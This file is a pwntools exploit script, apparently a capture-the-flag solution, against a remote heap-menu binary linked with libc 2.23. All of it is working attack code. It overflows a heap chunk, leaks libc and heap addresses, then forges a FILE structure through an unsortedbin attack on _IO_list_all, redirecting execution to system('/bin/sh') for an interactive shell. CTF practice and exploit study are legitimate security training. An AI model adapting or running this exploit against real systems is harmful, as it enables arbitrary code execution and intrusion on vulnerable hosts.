from pwn import *

context(arch='amd64',os='linux',log_level='debug')
myelf  = ELF("./pwn")
libc   = ELF("./libc-2.23.so")

#io    = process(myelf.path,env={"LD_PRELOAD" : libc.path})
io     = remote("182.92.203.154",28452)
uu64        = lambda data             :  u64(data.ljust(8, b'\0'))
sla         = lambda delim,data       :  (io.sendlineafter(delim, data))
sa          = lambda delim,data       :  (io.sendafter(delim, data))
add         = lambda index,size,data  :  (sla(">> ","1"),sla("on(0 ~ 5):",str(index)),sla("turbine: ",str(size)),sa("name: ",data))
show        = lambda index            :  (sla(">> ","2"),sla("viewed: ",str(index)))
edit        = lambda index,data       :  (sla(">> ","3"),sla("turbine: ",str(index)),sa("input: ",data))

#gdb.attach(io,"")

add(0,130,"a"*136+p64(0xf71))
add(1,0x1000,"xuan")
add(2,0x200,"xuan")

# leak libc
edit(0,"a"*144+"b"*8)
show(0);io.recvuntil("b"*8)
libc_addr = uu64(io.recv(6))-0x3c5188
log.success(hex(libc_addr))
edit(0,"a"*136+p64(0xf71))
libc.address = libc_addr

# leak heap
edit(0,"a"*152+"b"*8)
show(0);io.recvuntil("b"*8)
heap_addr = uu64(io.recv(6))
log.success(hex(heap_addr))
edit(0,"a"*136+p64(0xf71))

# unsortedbin attack
data = "a"*(0x290)
payload  = "/bin/sh\x00" + p64(0x61) 
payload += p64(0) + p64(libc.symbols['_IO_list_all']-0x10) 
payload += p64(0) + p64(1)
payload = payload.ljust(0xd8, "\x00")
payload += p64(heap_addr + 0x210 + 0xd8 + 0x8)+p64(libc.symbols['system'])*8
edit(0,data+payload)

# tigger
sla(">> ","1")
sla("on(0 ~ 5):",str(4))
sla("turbine: ",str(200))

io.interactive()